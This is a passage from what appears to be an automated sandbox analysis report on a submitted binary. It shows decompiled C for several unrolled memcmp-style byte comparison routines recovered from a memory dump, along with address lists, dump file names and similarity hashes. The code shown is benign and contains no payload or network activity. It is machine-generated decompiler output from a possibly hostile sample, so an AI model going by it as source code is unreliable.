									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























          0x00210113
          0x00210113
          0x00210119
          0x002101a0
          0x002101a2
          0x002101a4
          0x00000000
          0x00000000
          0x002101aa
          0x002101b0
          0x00210237
          0x00210239
          0x0021023b
          0x00000000
          0x00000000
          0x00210241
          0x00210247
          0x002102ce
          0x002102d0
          0x002102d2
          0x00000000
          0x00000000
          0x002102d8
          0x002102de
          0x00210365
          0x00210367
          0x00210369
          0x00000000
          0x00000000
          0x0021036f
          0x00210375
          0x002103fc
          0x002103fe
          0x00210400
          0x00000000
          0x00000000
          0x0021040c
          0x00210494
          0x00210496
          0x00210498
          0x00000000
          0x00000000
          0x0021049e
          0x002104a4
          0x0021052b
          0x0021052d
          0x0021052f
          0x0021052f
          0x00000000
          0x0021052f
          0x002104b1
          0x002104b3
          0x002104cb
          0x002104d3
          0x002104d5
          0x002104ed
          0x002104f5
          0x002104f7
          0x0021050f
          0x00210517
          0x00210519
          0x00210522
          0x00210522
          0x00000000
          0x00210519
          0x00210500
          0x00210509
          0x00000000
          0x00000000
          0x00000000
          0x00210509
          0x002104de
          0x002104e7
          0x00000000
          0x00000000
          0x00000000
          0x002104e7
          0x002104bc
          0x002104c5
          0x00000000
          0x00000000
          0x00000000
          0x002104c5
          0x0021041a
          0x0021041c
          0x00210434
          0x0021043c
          0x0021043e
          0x00210456
          0x0021045e
          0x00210460
          0x00210478
          0x00210480
          0x00210482
          0x0021048b
          0x0021048b
          0x00000000
          0x00210482
          0x00210469
          0x00210472
          0x00000000
          0x00000000
          0x00000000
          0x00210472
          0x00210447
          0x00210450
          0x00000000
          0x00000000
          0x00000000
          0x00210450
          0x00210425
          0x0021042e
          0x00000000
          0x00000000
          0x00000000
          0x0021042e
          0x00210382
          0x00210384
          0x0021039c
          0x002103a4
          0x002103a6
          0x002103be
          0x002103c6
          0x002103c8
          0x002103e0
          0x002103e8
          0x002103ea
          0x002103f3
          0x002103f3
          0x00000000
          0x002103ea
          0x002103d1
          0x002103da
          0x00000000
          0x00000000
          0x00000000
          0x002103da
          0x002103af
          0x002103b8
          0x00000000
          0x00000000
          0x00000000
          0x002103b8
          0x0021038d
          0x00210396
          0x00000000
          0x00000000
          0x00000000
          0x00210396
          0x002102eb
          0x002102ed
          0x00210305
          0x0021030d
          0x0021030f
          0x00210327
          0x0021032f
          0x00210331
          0x00210349
          0x00210351
          0x00210353
          0x0021035c
          0x0021035c
          0x00000000
          0x00210353
          0x0021033a
          0x00210343
          0x00000000
          0x00000000
          0x00000000
          0x00210343
          0x00210318
          0x00210321
          0x00000000
          0x00000000
          0x00000000
          0x00210321
          0x002102f6
          0x002102ff
          0x00000000
          0x00000000
          0x00000000
          0x002102ff
          0x00210254
          0x00210256
          0x0021026e
          0x00210276
          0x00210278
          0x00210290
          0x00210298
          0x0021029a
          0x002102b2
          0x002102ba
          0x002102bc
          0x002102c5
          0x002102c5
          0x00000000
          0x002102bc
          0x002102a3
          0x002102ac
          0x00000000
          0x00000000
          0x00000000
          0x002102ac
          0x00210281
          0x0021028a
          0x00000000
          0x00000000
          0x00000000
          0x0021028a
          0x0021025f
          0x00210268
          0x00000000
          0x00000000
          0x00000000
          0x00210268
          0x002101bd
          0x002101bf
          0x002101d7
          0x002101df
          0x002101e1
          0x002101f9
          0x00210201
          0x00210203
          0x0021021b
          0x00210223
          0x00210225
          0x0021022e
          0x0021022e
          0x00000000
          0x00210225
          0x0021020c
          0x00210215
          0x00000000
          0x00000000
          0x00000000
          0x00210215
          0x002101ea
          0x002101f3
          0x00000000
          0x00000000
          0x00000000
          0x002101f3
          0x002101c8
          0x002101d1
          0x00000000
          0x00000000
          0x00000000
          0x0021011f
          0x0021011f
          0x00210126
          0x00210128
          0x00210140
          0x00210140
          0x00210148
          0x0021014a
          0x00210162
          0x00210162
          0x0021016a
          0x0021016c
          0x00210184
          0x00210184
          0x0021018c
          0x0021018e
          0x00210197
          0x00210197
          0x00000000
          0x0021018e
          0x00210172
          0x00210175
          0x0021017e
          0x0020fcd6
          0x0020fcd6
          0x00210ac7
          0x00210ac7
          0x00000000
          0x0021017e
          0x00210150
          0x00210153
          0x0021015c
          0x00000000
          0x00000000
          0x00000000
          0x0021015c
          0x0021012e
          0x00210131
          0x0021013a
          0x00000000
          0x00000000
          0x00000000
          0x0021013a

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
          • Instruction ID: 4c13f62c78c5a9b44ef031dbe350faf9e3185100ab0a33bc143cdfa1dabe1122
          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
          • Instruction Fuzzy Hash: 82C1FA732251970AEF6D8A39857507EBAE16EB17B131A036ED8B3CB4C1FE60C5B4D520
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00210548, Relevance: .3, Instructions: 341COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E00210548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































          0x00210548
          0x00210548
          0x0021054e
          0x002105d6
          0x002105d8
          0x002105da
          0x00000000
          0x00000000
          0x002105e0
          0x002105e6
          0x0021066d
          0x0021066f
          0x00210671
          0x00000000
          0x00000000
          0x00210677
          0x0021067d
          0x00210704
          0x00210706
          0x00210708
          0x00000000
          0x00000000
          0x0021070e
          0x00210714
          0x0021079b
          0x0021079d
          0x0021079f
          0x00000000
          0x00000000
          0x002107ab
          0x00210833
          0x00210835
          0x00210837
          0x00000000
          0x00000000
          0x0021083d
          0x00210843
          0x002108ca
          0x002108cc
          0x002108ce
          0x00000000
          0x00000000
          0x002108d4
          0x002108da
          0x00210961
          0x00210963
          0x00210965
          0x00000000
          0x00000000
          0x00210973
          0x00210975
          0x0021098d
          0x00210995
          0x00210997
          0x002100f0
          0x002100f8
          0x002100fa
          0x00210107
          0x00210107
          0x00000000
          0x002100fa
          0x002109a4
          0x002100ea
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x002100ea
          0x0021097e
          0x00210987
          0x00000000
          0x00000000
          0x00000000
          0x00210987
          0x002108e7
          0x002108e9
          0x00210901
          0x00210909
          0x0021090b
          0x00210923
          0x0021092b
          0x0021092d
          0x00210945
          0x0021094d
          0x0021094f
          0x00210958
          0x00210958
          0x00000000
          0x0021094f
          0x00210936
          0x0021093f
          0x00000000
          0x00000000
          0x00000000
          0x0021093f
          0x00210914
          0x0021091d
          0x00000000
          0x00000000
          0x00000000
          0x0021091d
          0x002108f2
          0x002108fb
          0x00000000
          0x00000000
          0x00000000
          0x002108fb
          0x00210850
          0x00210852
          0x0021086a
          0x00210872
          0x00210874
          0x0021088c
          0x00210894
          0x00210896
          0x002108ae
          0x002108b6
          0x002108b8
          0x002108c1
          0x002108c1
          0x00000000
          0x002108b8
          0x0021089f
          0x002108a8
          0x00000000
          0x00000000
          0x00000000
          0x002108a8
          0x0021087d
          0x00210886
          0x00000000
          0x00000000
          0x00000000
          0x00210886
          0x0021085b
          0x00210864
          0x00000000
          0x00000000
          0x00000000
          0x00210864
          0x002107b9
          0x002107bb
          0x002107d3
          0x002107db
          0x002107dd
          0x002107f5
          0x002107fd
          0x002107ff
          0x00210817
          0x0021081f
          0x00210821
          0x0021082a
          0x0021082a
          0x00000000
          0x00210821
          0x00210808
          0x00210811
          0x00000000
          0x00000000
          0x00000000
          0x00210811
          0x002107e6
          0x002107ef
          0x00000000
          0x00000000
          0x00000000
          0x002107ef
          0x002107c4
          0x002107cd
          0x00000000
          0x00000000
          0x00000000
          0x002107cd
          0x00210721
          0x00210723
          0x0021073b
          0x00210743
          0x00210745
          0x0021075d
          0x00210765
          0x00210767
          0x0021077f
          0x00210787
          0x00210789
          0x00210792
          0x00210792
          0x00000000
          0x00210789
          0x00210770
          0x00210779
          0x00000000
          0x00000000
          0x00000000
          0x00210779
          0x0021074e
          0x00210757
          0x00000000
          0x00000000
          0x00000000
          0x00210757
          0x0021072c
          0x00210735
          0x00000000
          0x00000000
          0x00000000
          0x00210735
          0x0021068a
          0x0021068c
          0x002106a4
          0x002106ac
          0x002106ae
          0x002106c6
          0x002106ce
          0x002106d0
          0x002106e8
          0x002106f0
          0x002106f2
          0x002106fb
          0x002106fb
          0x00000000
          0x002106f2
          0x002106d9
          0x002106e2
          0x00000000
          0x00000000
          0x00000000
          0x002106e2
          0x002106b7
          0x002106c0
          0x00000000
          0x00000000
          0x00000000
          0x002106c0
          0x00210695
          0x0021069e
          0x00000000
          0x00000000
          0x00000000
          0x0021069e
          0x002105f3
          0x002105f5
          0x0021060d
          0x00210615
          0x00210617
          0x0021062f
          0x00210637
          0x00210639
          0x00210651
          0x00210659
          0x0021065b
          0x00210664
          0x00210664
          0x00000000
          0x0021065b
          0x00210642
          0x0021064b
          0x00000000
          0x00000000
          0x00000000
          0x0021064b
          0x00210620
          0x00210629
          0x00000000
          0x00000000
          0x00000000
          0x00210629
          0x002105fe
          0x00210607
          0x00000000
          0x00000000
          0x00000000
          0x00210554
          0x00210558
          0x0021055c
          0x0021055e
          0x00210576
          0x00210576
          0x0021057e
          0x00210580
          0x00210598
          0x00210598
          0x002105a0
          0x002105a2
          0x002105ba
          0x002105ba
          0x002105c2
          0x002105c4
          0x002105cd
          0x002105cd
          0x00000000
          0x002105c4
          0x002105a8
          0x002105ab
          0x002105b4
          0x00000000
          0x00000000
          0x00000000
          0x002105b4
          0x00210586
          0x00210589
          0x00210592
          0x00000000
          0x00000000
          0x00000000
          0x00210592
          0x00210564
          0x00210567
          0x00210570
          0x00000000
          0x00000000
          0x00000000
          0x00210570
          0x0020fcd6
          0x0020fcd6
          0x00210ac7

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
          • Instruction ID: 2d115d515a3772577035d23048d04dc48210db00435a76b029833639a8c70e19
          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
          • Instruction Fuzzy Hash: E2C1F8731151970AEF6D8A39857407EFAE16AB27B131A036ED8B2CB4C5FE50C5B4D520
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020FCDE, Relevance: .3, Instructions: 331COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020FCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
